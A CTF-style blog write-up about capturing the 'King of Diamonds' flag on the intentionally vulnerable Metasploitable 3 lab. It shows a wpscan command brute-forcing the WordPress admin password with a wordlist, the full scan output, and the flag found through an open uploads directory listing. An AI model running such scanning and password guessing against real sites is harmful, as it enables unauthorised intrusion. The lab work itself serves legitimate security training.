The King of Diamonds (damonds??)
Security research, CTF writeups, and hacking adventures
Metasploitable 3
The King of Diamonds:
So we have a WAMP server running Wordpress: Let’s throw a wpscan at it and try to guess the password of the admin user
root@igor-kali:~# wpscan –url 10.20.10.19:8585/wordpress –wordlist /usr/share/wordlists/fasttrack.txt –username admin
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://10.20.10.19:8585/wordpress/ [+] Started: Sun Dec 4 22:39:28 2016
[!] The WordPress ‘http://10.20.10.19:8585/wordpress/readme.html’ file exists exposing a version number [!] Full Path Disclosure (FPD) in ‘http://10.20.10.19:8585/wordpress/wp-includes/rss-functions.php’: C:\wamp\www\wordpress\wp-includes\rss-functions.php [+] Interesting header: LINK: http://10.20.10.19:8585/wordpress/wp-json/; rel=”https://api.w.org/” [+] Interesting header: SERVER: Apache/2.2.21 (Win64) PHP/5.3.10 DAV/2 [+] Interesting header: SET-COOKIE: nf_wp_session=490fe120af9b2724d7460db8489034de%7C%7C1480910607%7C%7C1480910547; expires=Mon, 05-Dec-2016 04:03:27 GMT; path=/wordpress/ [+] Interesting header: X-POWERED-BY: PHP/5.3.10 [+] XML-RPC Interface available under: http://10.20.10.19:8585/wordpress/xmlrpc.php [!] Upload directory has directory listing enabled: http://10.20.10.19:8585/wordpress/wp-content/uploads/ [!] Includes directory has directory listing enabled: http://10.20.10.19:8585/wordpress/wp-includes/
[+] WordPress version 4.6.1 identified from advanced fingerprinting (Released on 2016-09-07)
[+] WordPress theme in use: twentyfourteen - v1.8
[+] Name: twentyfourteen - v1.8 | Latest version: 1.8 (up to date) | Location: http://10.20.10.19:8585/wordpress/wp-content/themes/twentyfourteen/ | Readme: http://10.20.10.19:8585/wordpress/wp-content/themes/twentyfourteen/readme.txt | Style URL: http://10.20.10.19:8585/wordpress/wp-content/themes/twentyfourteen/style.css | Theme Name: Twenty Fourteen | Theme URI: https://wordpress.org/themes/twentyfourteen/ | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des… | Author: the WordPress team | Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection … [+] No plugins found [+] Starting the password brute forcer Brute Forcing ‘admin’ Time: 00:01:03 <===================================================================== > (181 / 183) 98.90% ETA: 00:00:01
+—-+——-+——+———-+ | Id | Login | Name | Password | +—-+——-+——+———-+ | | admin | | | +—-+——-+——+———-+
[+] Finished: Sun Dec 4 22:40:34 2016 [+] Requests Done: 225 [+] Memory used: 14.797 MB [+] Elapsed time: 00:01:06
OK, we didn’t get the password from the fasttrack list so I’m not going to bother right now with that, let’s see what else we got that is easy to examine:
Another uploads folder:
[!] Upload directory has directory listing enabled: http://10.20.10.19:8585/wordpress/wp-content/uploads/
Let’s see what’s there:
As promised, full directory listing and there it is… The King of Diamonds (or Damonds?!?!)
No metasploit used yet.
← Back to all posts

